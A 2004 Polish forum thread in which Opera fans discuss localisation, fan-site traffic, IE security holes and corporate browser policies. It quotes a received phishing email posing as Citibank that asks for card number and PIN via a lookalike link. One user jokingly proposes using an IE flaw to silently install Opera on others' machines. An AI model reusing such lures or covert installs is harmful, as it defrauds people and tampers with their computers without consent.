Originally posted by Ryszard
Opera ma to do siebie, że tak na prawdę może ją docenić ktoś o otwartym umyśle. Taki znajdzie sobie spolszczenie i zainstaluje. Ten, który nie znajdzie/nie zainstaluje i tak nie będzie używał Opery "bo mu piłkarzyki nie chodzą".
Jest cała rzesza tych, którzy będą używać, jeśli będą mieli od razu polską wersję. Ich tracimy. Opera Software traci.
Originally posted by Ryszard
Jak wchodzić na http://www.opera.com/download z polskim Windowsem to oferuje 7.23PL - na pewno lepsza od IE
Nie. Wielu osobom 7.23 nie przypadnie do gustu, podczas, gdy równocześnie 7.5x by przypadła. Ale nie mając polskiej wersji, nie będą jej używać.
"wielu osobom"...hmm..Nie. Wielu osobom 7.23 nie przypadnie do gustu, podczas, gdy równocześnie 7.5x by przypadła. Ale nie mając polskiej wersji, nie będą jej używać.
"jak wszyscy wiedzą", "jak powszechnie wiadomo" to największe i najchętniej używane przez polityków kłamstawa ludzkości
równie dobrze możnaby napisać ze 7.51 nie przypadnie jednym do gustu podczas gdy 7.23 jak najbardziej, np. mnie (piszę to spod 7.23 której wciąż używam, brak hotlisty w 7.51 nie przypadł mi specjalnie do gustu, tak samo jak preferencje w narzędziach i brak możliwości przeciągania obrazka LMB, które nie wiedzeć czemu pozbawili w tej wersji)
a jeśli ktoś zniechęca się do programu bo brak mu polskiego instalatora pomimo istnienia polskiego pliku językowego to trudno, ale tacy ludzie raczej nie szukają alternatywnej przeglądarki (po co skoro mają polskiego IE) i szkoda tracić na nich czasu
Originally posted by Mayor
"wielu osobom"...hmm..
"jak wszyscy wiedzą", "jak powszechnie wiadomo" to największe i najchętniej używane przez polityków kłamstawa ludzkości
równie dobrze możnaby napisać ze 7.51 nie przypadnie jednym do gustu podczas gdy 7.23 jak najbardziej, np. mnie (piszę to spod 7.23 której wciąż używam, brak hotlisty w 7.51 nie przypadł mi specjalnie do gustu)
Prawy klik na pasek wyboru paneli, Customize Toolbars -> Placement=Top, Wrapping=Wrap to Multiple lines, Style=Text Only... O! Hotlista!
Interfejs nowej opery jest czysty i na pewno przyciągnie więcej osób. Wszystko jest kwestią gustu, więc jeśli byś chciał, możesz się w tej kwestii spierać ze mną do upadłego, ale chyba Opera wie co robi i uradzili z ekspertami od projektowania interfejsu, ekspertami od używalności (usability) i we współpracy z użytkownikami, jak zrobić nowy interfejs lepszym, a nie gorszym. I różnica jest znaczna, interfes jest niewątpliwie bardziej przejrzysty, stonowany, co pozwala sądzić, że przyciągnie więcej osób, które spróbują nowej wersji.
Originally posted by Mayor
a jeśli ktoś zniechęca się do programu bo brak mu polskiego instalatora pomimo istnienia polskiego pliku językowego to trudno, ale tacy ludzie raczej nie szukają alternatywnej przeglądarki (po co skoro mają polskiego IE) i szkoda tracić na nich czasu
Jakiego czasu szkoda tracić? Lepiej by było dla wszystkich, gdyby mieli polskojęzyczną wersję i jej używali.
Originally posted by Mayor
brak możliwości przeciągania obrazka LMB, które nie wiedzeć czemu pozbawili w tej wersji
Spójrz na poniższy link człowieku małej wiary
http://www.opera.com/support/search/supsearch.dml?index=756
Prawy klik na pasek wyboru paneli, Customize Toolbars -> Placement=Top, Wrapping=Wrap to Multiple lines, Style=Text Only... O! Hotlista!
faktycznie
co do reszty, nie chce mi sie spierać, a bojkotuj sobie co chcesz
Originally posted by lockoom
Spójrz na poniższy link człowieku małej wiary
http://www.opera.com/support/search/supsearch.dml?index=756
działa!jak widać takie wątki bywają czasem pożyteczne
chyba wreszcie się przesiąde na 7.51thx 4 you both
Originally posted by andol
Ilość odwiedzin mini strony drastycznie wzrosła.
Wczoraj, tzn. 27 czerwca 2004, mini strona zanotowała największą ilość odwiedzin w swej historii: 1035 użytkowników, 1169 wizyt. Dla porównania, średnia dzienna liczba użytkowników (za ostatnie 3 miesiące) to 360.
Ostatni tydzień:
poniedziałek - 488 wtorek - 464 środa - 442 czwartek - 441 piątek - 380 sobota - 737 niedziela - 1036
Pogratulować, pogratulować!
Powinszowania należą się nie tylko andolowi, ale także Gatesowi , ale ja tego nie powiedziałem...
opera +pliki językowe = opera PL więc w czym problem?
http://www.opera.com/buy/poland/ - Opera
http://starzaki.eu.org/~hclan/operapl/opera.html - spolszczenie (w tym polskie wyszukiwarki, plik językowy, kodowanie, itp.)
a co do promowania opery to nie chodzi wcale o nabijanie kasy Norwegom, tylko o przekonanie ludzi do olania IE, z czym wiąże się lepsza obsługa stron www (więcej ludzi w statystykach używa opery więc strona musi być z nią kompatybilna (a nie tylko z IE) i trzeba się liczyć też i z tą klientelą)
jak widzisz że gosciu przekonuje sie do opery ale na starcie zrzędzi "łeee, jakiś baneeer...a to trzeba płaciiić..." poinformuj go o promocji i problem zniknie
tak więc jak już chcesz bojkotować i jednocześnie propagować to możesz to robić własnie w taki sposób
Bądź co bądź jesteśmy "w gościach" i pewne rzeczy po prostu są niestosowne.
SS
@Mayor - w zasadzie się z Tobą zgadzam, zwłaszcza z
o przekonanie ludzi do olania IE, z czym wiąże się lepsza obsługa stron www (więcej ludzi w statystykach używa opery więc strona musi być z nią kompatybilna (a nie tylko z IE)
Ja też się mogę pochwalić... www.mojaopera.idu.pl także tego samego dnia przeżyła oblężenie. Średnia użytkowników z ostatnich 3 miesięcy to 359 a w tą niedzielę pomnożyło się razy 4 i pół do ponad 1500.
Niedziela - 328
Poniedziałek - 326
Wtorek - 348
Środa - 314
Czwartek - 353
Piątek - 345
Sobota - 899
Niedziela - 1555
No i Chip się obudził: http://newsroom.chip.pl/news_107364.html
Scobaniec... he, he...
Originally posted by Ryszard
Opera ma to do siebie, że tak na prawdę może ją docenić ktoś o otwartym umyśle. Taki znajdzie sobie spolszczenie i zainstaluje. Ten, który nie znajdzie/nie zainstaluje i tak nie będzie używał Opery "bo mu piłkarzyki nie chodzą".
Jak wchodzić na http://www.opera.com/download z polskim Windowsem to oferuje 7.23PL - na pewno lepsza od IE
Ale nie lepsza od 7.51, a tak ci o "mniej otwartych umyslach" zawsze jeszcze maja mozille firebirdy i inne.
P.S.
Widze ze "elitarnosc" tu juz taka jak w UPR, a to tylko na szkode dziala niestety.
ja się muszę pochwalić, dzisiaj dostałem coś takiego:
"Support" <cash@citibank.com>
Do: <Ocznik@mx4.go2.pl>
Temat: Please confirm your account details with Citibank
Data: Tue, 29 Jun 2004 01:43:33 +0300
Dear Customer,
This email was sent by the Citibank server to verify your E-mail
address. You must complete this process by clicking on the link
below and entering in the small window your Citibank Debit
Card number and PIN that you use on ATM.
This is done for your protection - because some of our members
no longer have access to their email addresses and we must
verify it.
To verify your E-mail address and access your bank account,
click on the link below:https://wwww.citibank.com/signin/confirmation.jsp
---------------------------------------Thank you for being our customer---------------------------------------
czy to to?
No prosze WWWW.citibank.com... niezle Podales dane? :>
Originally posted by Dro77naR
No prosze WWWW.citibank.com... niezle
I co z tego, że "wwww"..? I tak ta domena może być zarządzana tylko przez Citibank, więc nic to nie zmienia. Ale jeśli pod tym tekstem krył się prawdziwy, obcy adres w postaci np. jakiegoś IP, to co innego.
@oksza - jesteś pewny, że tak chciałeś - dać tu swój aders e-mail? Przy okazji - podając bankowi adres dałeś taki - @mx4.go2.pl?
Na o2.pl jest:
» 3 adresy e-mail do jednego konta:
...@o2.pl
...@tlen.pl
...@go2.pl
158pict.png
-->>Ryszard
Do: <Ocznik@mx4.go2.pl>
O tym mówisz? To nie jest mój mail. Zresztą gdyby nawet był....
Nie podawałem nic bankowi. Mam konto na City, ale kontatkuję się z nimi tylko przez bankomaty i telefon.
Jeszcze dwa ciekawe artykuły w języku angielskim.
Pierwszy ocenia szanse znacznego zwiększenia udziałów w rynku alternatywnych przeglądarek w wyniku ostatnich wydarzeń.
Drugi opisuje powrót do życia starego buga w MSIE usuniętego sześć lat temu
Niezły kwiatek http://hacking.pl/news.php?id=4007 I pomyśleć że CitiBank z uporem maniaka domaga się korzystania z IE ewentualnie z Opery ale z identyfikacją na IE.
Jak ktoś ma chęć ( bo Nasty już sobie chyba odpuścił ...? ) to można się przejechać na webmajstrach CitiBank'u
Pozdrawiam
Zbyszek
Inny artykuł: CHIP: Dziurawiec
Ostatnie zdanie tej notatki jest rozbrajające:
Wiele firm nie może tak po prostu zmienić używanej przeglądarki, gdyż potrzebują narzędzia, które dobrze obsługuje DHTML, VBScript czy ActiveX.
Sugeruje ono zwykłemu, nieznającymi się na rzeczy czytelnikowi, że alternatywne przeglądarki są gorsze, gdyż nie obsługują dobrze czegoś tam...
zauważyłem, że w sieci zmienia się podejście do alternatywnych przeglądarek.
rok temu, zwracając autorowi uwagę o niekompatybilności jego dzieła, można się było narazić na obelgi i wyzwiska.
dzisiaj o dziwo, w większości przypadków, reakcje są zgoła inne...
Tiaa? To jak będę chciał kogoś przekonać, to poproszę o to ciebie, skoro tobie to tak dobrze wychodzi...
Ja muszę się godzinę nagadać, żeby ktoś w ogóle zrozumiał, dlaczego ma używać czegoś innego niż IE... Niektórzy po prostu myślą "jest przeglądarka, strona się wyświetla... czego oni jeszcze od tej cholernej przeglądarki chcą!?" i nie rozumieją, po co cokolwiek zmieniać, skoro wszystko działa, a co więcej - z tej samej przeglądarki korzysta zdecydowana większość internautów...
A gdy uda mi się wreszcie przekonać do Opery... to jeszcze muszę dokładnie tłumaczyć co, gdzie i jak... bo strona o Operze to dla nich za mało... jakby nie ufali autorowi, muszą się dopytać mnie, żeby być pewnym...
A gdy ktoś robi stronę i przerzuca się na Operę, to już w ogóle na GG mam rozmówcę na całe tygodnie... i tłumaczę, dlaczego coś nie działa w Operze, a w IE działa itp. itd.
A tak na marginesie - zauważyłem, że większość userów i tak nie wykorzystuje możliwości Opery... Nie wiedzą (nawet nie sprawdzą, nie przeczytają, a już na pewno - nie domyślą się), że jest coś takiego jak "skórka", że można dodawać własne buttony, zmieniać menu, albo chociaż używać kart, notatek, M2, pozmieniać jakiekolwiek opcje... No normalnie ja nie wiem, jak z takimi osobami gadać... Naprawdę, dajcie mi radę, bo czasami nie wyrabiam. Jak wy dajecie sobie radę z niektórymi topornymi ludźmi?
Ech... nagadałem się, ale mi lepiej.
daroc napisał(a)
A tak na marginesie - zauważyłem, że większość userów i tak nie wykorzystuje możliwości Opery... Nie wiedzą (nawet nie sprawdzą, nie przeczytają, a już na pewno - nie domyślą się), że jest coś takiego jak "skórka", że można dodawać własne buttony, zmieniać menu, albo chociaż używać kart, notatek, M2, pozmieniać jakiekolwiek opcje... No normalnie ja nie wiem, jak z takimi osobami gadać... Naprawdę, dajcie mi radę, bo czasami nie wyrabiam. Jak wy dajecie sobie radę z niektórymi topornymi ludźmi?
Wiesz, dopasowywanie Opery do swoich potrzeb to proces a nie wydarzenie ;-) Ja np. bardzo powoli przekonywałam się do skórek czy M2. Dość szybko załapałam gesty i używanie kart czy notatek. Ale już np. menu to niedawno zaczęłam "oglądać" z bliska, przycisków też jeszcze nie mam żadnych ani ściągniętych, ani tym bardziej zrobionych. Po prostu na wszystko trzeba czasu i spokoju. Każdy ma swoje tempo i odwagę grzebania w Operze.
A poza tym - przecież najważniejsze jest, że ci ludzie zaczęli używac Opery, rezygnując z misia a w jaki sposób to robią to już przecież ich sprawa :-)
Tak, ale jeśli nawet zaczną używać Opery, nie znając jej zalet, to przy odkryciu pierwszej lepszej wady (która i tak na pewno jest nieporównywalnie mniejsza niż którakolwiek w IE) powracają do swojego starego (kochanego?!) misia... Natomiast gdyby znali większość dużych zalet Opery, to te niewielkie wady nie przeszkadzały by im tak bardzo, albo chociaż czekaliby na nowszą wersję...
Rzecz oczywista.Opera jest prawie pozbawiona wad.
M$ to kicha.
Ciekawy news ze strony http://pclab.pl Wygląda na to, że rozpoczyna się niekontrolowana nowa Browser Update Campaign, hmm... a raczej Browser Change Campaign
Dziś nie wytrzymałem ... wysłałem list do Citibanku
Spytałem dlaczego zalecają korzystać z IE oraz jak mnie jako klienta zabezpieczją przed keylogger'ami.
Pozdrawiam
Zbyszek
Ach tu jest dopiero pięknie: http://www.eweek.com/ Cała seria artykułów analizujących słabości MSIE, radzących jak pozbyć się MSIE w przedsiębiorstwach i itp. Cały serwis tematycznie skierowany jest do klientów korporacyjnych. Rewolucja zacznie się z chwilą, gdy klienci korporacyjni zaczną rezygnować z MSIE, tak myślę.
Explorer jednak dziurawy
dostępniony w ubiegłym tygodniu przez Microsoft patch, mający usuwać niebezpieczne błędy z przeglądarki Internet Explorer, nie jest w pełni skuteczny - alarmują eksperci. Zdaniem Jelmera Kuperusa, holenderskiego konsultanta ds. bezpieczeństwa systemów informatycznych, uaktualnienie nie "łata" pewnej bardzo niebezpiecznej luki w zabezpieczeniach przeglądarki. Na poparcie swoich słów Kuperus stworzył "exploita", umożliwiający skuteczne zaatakowanie systemu, w którym zainstalowano wszystkie udostępnione do tej pory przez Microsoft patche. W tej sytuacji eksperci zalecają użytkownikom zrezygnowanie z korzystania z IE i zainstalowanie którejś z alternatywnych przeglądarek, np. Opery, czy Mozilli.http://www.pcworld.pl/news/news.asp?m=7&id=68410
hehe....
no i ciekawe co na to Micro$oft
Ja za pomocą Internet Explorera odważam się zapuszczać
tylko w dobrze znane strony.
To i tak jesteś odważny(a)
Microsoft Internet Explorer Multiple Vulnerabilities
hehe, kolejne 4 luki w IE wszystkie mają rangę 5/5 (Extremely critical)http://secunia.com/advisories/12048/
Re: Microsoft Internet Explorer Multiple Vulnerabilities
Originally posted by lockoom
hehe, kolejne 4 luki w IE wszystkie mają rangę 5/5
No to polskie serwisy Opery/Mozilli/Firefoksa czekają teraz na odwiedziny kolejnych tysięcy nowych potencjalnych użytkowników... Oczywiście po opublikowaniu tej informacji przez polskie serwisy informacyjne.
Na razie widziałem informację o czterech, ale megapikselach Epsona
W koncu koniec IE ????
http://infojama.pl/article.php?sid=2649Re: W koncu koniec IE ????
Pisałem o tym dwa dni temuhttp://my.opera.com/forums/showthread.php?s=&postid=624297#post624199
Ja też Zachęcam do odwiedzin powyższego superwątku ;]
No nic trudno odwiedziłem infojame zobaczyłem nową informacje na infojamie i chciałem sie nia podzielic z innym.idarek napisał(a)
Ja też
[mam nadzieję że tego jeszcze nie było]
Hotclickbug, wersja 3, jeszcze chyba tego nie było...
I kolejna luka w IE umożliwiająca atak typu phishing:
http://secunia.com/advisories/12304/
I kolejna ! W dodatku highly critical a poprzednia byla moderately...
http://secunia.com/advisories/12321/
I lllove this game !
Pozdrawiam,
janbar.)
Moj Tata po przeczytaniu w gazecie (chyba na Gazeta . pl) powiedzial zebym mu wywalil IE z komputera ; > Wczesniej tez juz korzystal z Opery, ale dopiero po tych wiadomosciach uzywa jej na stale. ; ) I kazdego kogo zna (z komputerem) opowida o tym zeby nie korzystal z IE bo to gorsze itp.. ; >
Tata w wiekszosci na komputerze czyta tylko gazety i gra w pasjansa czyli jest bardzo zwyklym uzytkownikiem ; >
Originally posted by janbar
I kolejna ! W dodatku highly critical a poprzednia byla moderately...
http://secunia.com/advisories/12321/
I lllove this game !
'"Program atakującego może zostać umieszczony w folderze autostartu Windows i włączyć się przy następnym starcie systemu. Ekspert o nicku "http-equiv", który znalazł opisywaną lukę, pokazał już z jak dużym zagrożeniem mamy do czynienia.
"Gdy patrzysz na stronę internetową, widzisz jedynie dwie czerwone linie i obrazek; przeciągnij obrazek poprzez dwie linie i go upuść" - powiedział. "Właśnie umieściłeś program w folderze autostartu Windows. Przy następnym starcie systemu program ten się włączy."
Secunia, firma zajmująca się badaniami wszelkich luk i problemów, stwierdziła, że kod wykorzystywany do tego typu operacji może zostać napisany tak, aby do jego wykonania wystarczało jedynie kliknięcie na obrazku. Secunia oceniła problem jako "Krytyczny", który zajmuje drugie miejsce na pięcio stopniowej liście.
Microsoft stwierdził natomiast, że problem nie jest poważny, ponieważ atakujący musi przekonać ludzi do odwiedzenia odpowiednio spreparowanej strony i kliknięcia na obrazek. Tym samym Microsoft nie określił problemu jako krytyczny.' (z xp.net.pl)
Nie no, jasne, jak zwykle.
Rozumiemy. Trzymaj tak dalej MS, idź w zaparte, olewaj bezpieczeństwo, zobaczymy ile jeszcze na tym pociągniesz.
kod wykorzystywany do tego typu operacji może zostać napisany tak, aby do jego wykonania wystarczało jedynie kliknięcie na obrazku.
hehe, rozumiem jesli ktoś kliknie na obcy link EXE, BAT, PIF itp i kliknie "Otwórz" ale niby co, użytkownik IE ma sie obawiać nawet kliknięcia na obrazek?
przykładowy post:
hej, zobaczcie dzisiejsze medalistki z Aten!
(kliknij w miniaturke żeby zobaczyć pełny obrazek)
widać miniaturkę medalistek na podium np. [img]http://bi.gazeta.pl/im/2242/z2242271N.jpg
no i co, 99% ludzi to kliknie bo niby co, mieli by sie obawiac .jpg?
Bravo Bill!! jak to możliwe że wciąż IE żyje i "ma się dobrze"
PS. akurat to forum nie obsługuje fotek pomiędzy [img] więc widać tylko link
Jedno klikniecie i dowolny program jest umieszczany w dowolnym katalogu
na moim dysku.
Nie ma sie czego bac, przeciez "atakujacy musi przekonac uzytkownikow do odwiedzenia
strony i klikniecia na obrazek"
Jak to wczoraj przeczytalem na stronach secunii, to najpierw mnie zatkalo
i myslalem ze to zart. Az sprawdzalem czy jestem na prawde na dobrej stronie
Rzeczywistosc wygrywa chyba z moja wyobraznia.
Czekam na SP2 do WinXP i krew mnie zalewa,bo aż we wrześniu.
Inne kraje,w tym Sudan już mają SP2 - a my jak zwykle,debile z M$ Poland.......
Czekam na SP2 do WinXP..(...)
Nie masz się co spieszyć jeśli chodzi o tą lukę...
The vulnerability has been confirmed on a fully patched system with Internet Explorer 6.0 and Microsoft Windows XP SP1/SP2.
hmm a może tak troche wspomóc rozwój opery wykorzystując tą luke?
"Jedno klikniecie i dowolny program jest umieszczany w dowolnym katalogu
na moim dysku."
co wy na to: tym dowolnym programem byłby program instalacyjny Opery oraz IEradicator (do permamentntego usuwania IE z systemu)
przy następnym uruchomieniu koputera wzbogacamy się o kolejnego zadowolonego użytkownika
Originally posted by Mayor
hmm a może tak troche wspomóc rozwój opery wykorzystując tą luke?
"Jedno klikniecie i dowolny program jest umieszczany w dowolnym katalogu
na moim dysku."
co wy na to: tym dowolnym programem byłby program instalacyjny Opery oraz IEradicator (do permamentntego usuwania IE z systemu)
przy następnym uruchomieniu koputera wzbogacamy się o kolejnego zadowolonego użytkownika
IEradicator:confused:
Jest takie coś i gdzie
Originally posted by orlik
IEradicator:confused:
Jest takie coś i gdzie
Tutaj
To wygląda, jakby myślał, że zmiana identyfikacji zmienia zachowanie przeglądarki tak, jakby była inną przeglądarką (np. Mozillą albo Internet Explorerem)... Czyli jak mi strona źle wygląda w Operze, to zmieniam identyfikację na IE i oglądam stronę tak jak w IE... (ICOCBW)
Jeśli strona wykrywa Operę, i podaje jej inny arkusz styli niż IE, to tak faktycznie może wyglądać.
Niemcy idą na wojnę z MSIE: http://www.di.com.pl/n/?lp=7552
Jest też reakcja OS ASA w tej sprawie:http://www.opera.com/pressreleases/en/2004/09/14/
Czuję tu rękę z artykułu operapl.net/NIE
"Jest to deklaracja o tyle komiczna, iż choć i w alternatywnych przeglądarkach wykrywane są co jakiś czas błędy, to jednak dzieje się to nieporównywalnie rzadziej, a łatane są zazwyczaj w ciągu maksymalnie dwóch tygodni. Dla porównania niektóre dziury IE łatane były dopiero po dwóch latach. Zdarzały się też poprawki do IE, które ukazywały się szybko, ale nie były w pełni skuteczne."
Dobrze, że autor artykułu skomentował jasno tą deklarację MS. Brawa dla tego pana!!
A co do całej kwestii - nie posiadam się z radości. Brak mi słów, żeby wyrazić jak się cieszę! Doomsday dla IE nadchodzi, już jest za rogiem. Giń przepadnij siło nieczysta!
Gdyby takie coś było w Polsce... zakaz używania IE...
No nareszcie! To bardzo powazny cios dla IE, oficjalny komunikat
od powaznych organizacji panstwowych.
IE idzie na dno, woohooo
ROTFL(...)Reakcją niemieckiego oddziału Microsoftu było stwierdzenie, iż Internet Explorer nie ustępuje bezpieczeństwem innym przeglądarkom, a łaty na ew. błędy pojawiają się szybko.
baj de łej, nie dziwi mnie to bo to w Niemczech ruszyła jakis czas temu akcja Linux w urzędach; Niemciecki rząd jest chyba najmądrzejszym rządem ostatnimi czasy na świecie, w szukaniu oszczedności sięgneli po tak banalny i genialny pomysł jak open source i programy freeware w urzędach zamiast wydawać grube miliony na oryginalne Windowsy, Office'y itp oprogramowanie na rzecz Linux, Opne Office itp.
ciekawe kiedy w bidnej Polsce się doczekamy na taki krok, chyba nigdy bo wujek Bill ma z rządem (aż za) dobre stosunki a już widze ta reakcje w urzędach "ło Jezu a to sie czeba przestawiaaać, a to sie czeba znaaać.."
więc najlepiej po prostu sięgnąć do kieszeni emerytów, pielegniarek itp.plus z racji istnienia IE w urzędach "czeba" wydawać tez sporo kasy na soft który to bedzie ochraniał (any dialery, anty wirusy, anty trojany, anty loggery, firewalle,...) wszystko oczywiście oryginalne więc znowu kasa idzie nie wiadomo po co i do kogo
Jesli chodzi o ludzi zajmujacych sie oprogramowaniem w urzedach (a znam kilku),
to na pytanie dlaczego nie przejda na open source odpowiadaja:
"nie mozna w urzedzie uzywac programu ktory ktos tam sobie napisal dla zabawy,
jakas powazna firma musi gwarantowac ze to dziala"
(nie wiem czy microsoft kiedykolwiek powiedzial ze cos gwarantuje, wiem ze ich
programy czesto nie dzialaja)
"darmowe programy nie moga zostac wprowadzone, bo oprogramowanie w urzedach musi
zapewniac odpowiedni stopien bezpieczenstwa"
(cokolwiek by to mialo znaczyc)
"przenoszenie danych zajeloby za duzo czasu, a poza tym nikt nie potrafi tych
programow uzywac"
A prawda jest zapewne taka, ze nikomu na tym nie zalezy Dopoki jest jak jest,
nie trzeba sie wysilac. Zmiany oznaczaja wytezona prace, przynajmniej na poczatku,
a nikt nie chce ciezej pracowac.
Originally posted by MrL "nie mozna w urzedzie uzywac programu ktory ktos tam sobie napisal dla zabawy,jakas powazna firma musi gwarantowac ze to dziala"
Kiedyś w pracy przeczytaliśmy licencje na AutoCad'a ... jakież było nasze zdziwienie ... firma nie gwarantuje że program bedzie działał poprawnie ani że może być przydatny ... (jakoś to tak mniej wiecej było) LOL
No a powiem, że program kosztuje ok 20.000 PLN
Pozdrawiam
Zbyszek
Originally posted by Ultrazbig
firma nie gwarantuje że program bedzie działał poprawnie ani że może być przydatny ...
Czyz nie jest to piekne? Marzeniem niejednego producenta jest sprzedawac swoj
towar bez martwienia sie ze nie dziala, albo ze cos sie w nim posypie.
Informatyka to fascynujaca dziedzina.
Ja ostatnio tez spotkalem sie z oporem w mojej nowej firmie - w ktorej niestety jesli chodzi o informatyke jestem jedynie petentem
Nie mozna instalowac wlasnego softu (nawet free) - musimy zglosic takie zapotrzebowanie do dzialu IT i jesli udowodnimy ze dany program jest nam potrzebny (lepiej niezbedny) do pracy to laskawie pojawia sie ktos z IT i nam go instaluje.
Odpowiedzi jakie uslyszalem na pytanie "Dlaczego nie moge uzywac Opery?" Delikatnie mnie rozczulily. (Od "Bo nie." do "Bo moze zapisywac w pamieci i na przyklad wieszac SAP'a")
Argumentacja o bezpieczenstwie tez nie dziala - "Jakie strony zwiazane z Pana praca moga byc niebezpieczne?"
Prawda jest taka ze chodzi o support. Wszyscy ludzie z IT znaja IE i w calej (dosc duzej) korporacji jako przegladarka jest IE - i nikomu nie bedzie sie chcialo nauczyc obslugi Opery zeby potem wiedziec jak rozwiazac problem. Smutne - ale prawdziwe.
Nawet chcialem juz zrezygnowac z supportu, podpisac swistek ze chce Opere na wlasna odpowiedzialnosc - "Nie."
Jedyne co mnie pociesza ze do poczty uzywamy Notes'ow Lotusa a nie Outlooka...
Moze to troche offtopic, ale nie chcialem zakladac osobnego watku zeby wylewac moje zale.
/Edit:
Ciagle poszukuje stron zwiazanych z okolicami mechaniki, robotyki ktore by sie zle wyswietlaly w najnowszym (bo do upgrade'ow jakos udaje mi sie ich przekonac) IE - to bylby juz jakis argument.
tak to smutne jak bardzo popularne jest debilne przedpotopowe myślenie, widać dział IT nawet się nie interesuje nowościami z branży bo by wiedzieli że narażają firme na straty
wiesz podejrzewam że dopiero jak Wam konkurencja albo jakiś dzieciak zrobi włam używając powszechnie znanych dziur w IE to dopiero się zbiorą i zaczną myśleć
myśle że zmiany sposobu myślenia należy sie spodziewać nie wczesniej jak za 5 lat - kiedy do głosu dojdą ci którzy w tej chwili studjują i orientują się co i jak w IT, którzy używają już teraz Opery, Firefoxów, Mozillek i Linuxów a kiedy wygryzą wreszcie te stare zasiedziałe naleciałości z zeszłej epoki jakie pałętają sie jeszcze po wielu firmach (bez obrazy dla tych normalnych)
No i - cytat z pamięci, na pewno nie z tego forum, na pewno nie pisał śpiewak sieci, ale gdzie to widzaiałem???
Nie używanie IE jest trendi.
Na początek disklejmer: znam dość dobrze Operę, używam jej od wersji 5.coś, wiem czemu jest lepsza od IE. Nie pieklcie się na mnie jak na fana misia, bo nim nie jestem. Ale na takie posty jak Kubaka i Mayora, to trzeba odpowiedzieć.
Kubak:
Oczywiście, że nie można. Instalowanie własnego softu przez pracowników to jest podstawowe źródło wirusów i innych zagrożeń w intranecie.Nie mozna instalowac wlasnego softu (nawet free)
Ty jesteś odpowiedzialny za swoją robotę a dział IT za działanie Twojego komputera. Dlatego wygląda to tak, a nie inaczej. Dopóki mówimy o dużej firmie, gdzie pracują nieinformatycy, dopóty jedyna możliwość zapewnienia stabilnej pracy to zakaz modyfikacji i instalowania czegokolwiek przez użyszkodników. Naprawdę.jesli udowodnimy ze dany program jest nam potrzebny (lepiej niezbedny) do pracy to laskawie pojawia sie ktos z IT i nam go instaluje
Za to ta argumentacja bardzo dobrze działa. Ja też się zapytam: jakie strony, które są Ci potrzebne służbowo, na służbowym komputerze, mogą być niebezpieczne? Przecież nie będziesz oglądał panienek, czy ściągał warezów.Argumentacja o bezpieczenstwie tez nie dziala - "Jakie strony zwiazane z Pana praca moga byc niebezpieczne?"
Co Ty wymyślasz, SAPa macie w pracy i uważasz, że wasz IT nie umiałby Opery obsługiwać? Bzdury.nikomu nie bedzie sie chcialo nauczyc obslugi Opery zeby potem wiedziec jak rozwiazac problem
Mayor:
Niestety, muszę Cię zmartwić. Nie jest tak idealnie, żeby dział IT mógł podejmować decyzje, co jest zainstalowane, a co nie. IT zna takie wynalazki jak Opera czy Mozilla. Fakty są takie, że misia da się zdalnie zainstalować oraz uaktualniać, Operę nie. Fakty są takie, że duże firmy mają kilkaset - kilka tysięcy stacji roboczych, a na nich winde i misia, wdrożenie Opery to jest długotrwały i kosztowny projekt. Niestety, im większa struktura, tym droższe są jakiekolwiek zmiany w niej.widać dział IT nawet się nie interesuje nowościami z branży
Na koniec jeszcze raz napiszę, nie miałem intencji pisać flejma, chciełem tylko pokazać, jak wygląda sytuacja w dużych firmach w IT.
I tu jest właśnie pies pogrzebany. Sam jestem adminem sieci, wszyscy użyszkodnicy mają konta użytkowników i oczywiście, żeby coś zainstalować/uaktualnić, muszę wędrować po 40 komputerach, a to nie jest zbyt rozrywkowe zajęcie. Gdybym zresztą tylko tym się zajmował... Dlatego ja jak na zbawienie czekam, na takie narzędzia do zarządzania administracyjnego instalacjami z jednego kompa. Wiem, że Opera coś takiego chce/zamierza opracować.matsu napisał(a)
Niestety, muszę Cię zmartwić. Nie jest tak idealnie, żeby dział IT mógł podejmować decyzje, co jest zainstalowane, a co nie. IT zna takie wynalazki jak Opera czy Mozilla. Fakty są takie, że misia da się zdalnie zainstalować oraz uaktualniać, Operę nie. Fakty są takie, że duże firmy mają kilkaset - kilka tysięcy stacji roboczych, a na nich winde i misia, wdrożenie Opery to jest długotrwały i kosztowny projekt. Niestety, im większa struktura, tym droższe są jakiekolwiek zmiany w niej. [/B]
matsu napisał(a)
Za to ta argumentacja bardzo dobrze działa. Ja też się zapytam: jakie strony, które są Ci potrzebne służbowo, na służbowym komputerze, mogą być niebezpieczne? Przecież nie będziesz oglądał panienek, czy ściągał warezów.
Z tym jednym argumentem się nie zgodzę. Przecież powszechnie wiadomo (co jakiś czas można o tym przeczytać czy usłyszeć), że duża część pracowników właśnie to robi, poza tym mogą również przez przypadek wejść na niebezpieczne strony. I z tego powodu dobrze by było ze względów prewencyjnych, gdyby jednak wszyscy pracownicy korzystali z bezpieczniejszych przeglądarek.
Ale rzeczywiście, może być trochę czasochłonne instalowanie i aktualizowanie programów na każdym z komputerów, gdy jest ich kilkadziesiąt czy więcej.
PS. Przypomniałem sobie właśnie o jakimś trojanie, o którym było głośno kilka miesięcy temu i kóry zainfekował z powodu dziury w Windowsie teoretycznie bezpieczne serwisy, i po wejściu na strone za pomocą IE zarażał system użytkownika i potem wysyłał informacje gdzieś na rosyjski serwer.
heh nie trzeba włazic na xxx strony żeby sie przejechać, wtedy mozna co najwyżej złapać wirusa
to co jest 100x bardziej niebezpieczne to celowe zwabienie kogos na dana stronę żeby uzyskać dostep do kompa pracownika i danych firmy
to nie jest tak że pracownicy w firmie mają internet tylko i wyłącznie do kilku sprawdzonych stron; w zaleznosci od potrzeb i rodzaju pracy w ciagu dnia wchodzi się na rózne strony, wystarczy że potencjalny fałszywy klient poda pracownikowi linka do strony rzekomej firmy celem udostępnienia jakichś danych ("mam spotkanie za 5 minut i bardzo się śpiesze, wszystko co potrzebne znajdzie Pani na oficjalnej stronie firmy, www.wpadłaś.jak.sliwka.w.kompot.com ") no i bum
zresztą jest milion innych sposobów żeby zmusić pracownika do wejścia na stronę czy kliknięcia na link, przeciez po to ma internet i "połatanego" IE żeby nie musieć się niczego obawiać
jedyny fakt który przemawiałby za nieuzywaniem FF, Mozilli czy Opery to własnie to nieszczęsne zdalne uaktualnianie w przypadku groma komputerów, niemniej jednak ja uznałbym bezpieczeństwo firmy za sprawe o wiekszym priorytecie niż niedogodności z uaktualnianiem softu (dla takiej Opery - góra kilka razy w roku);
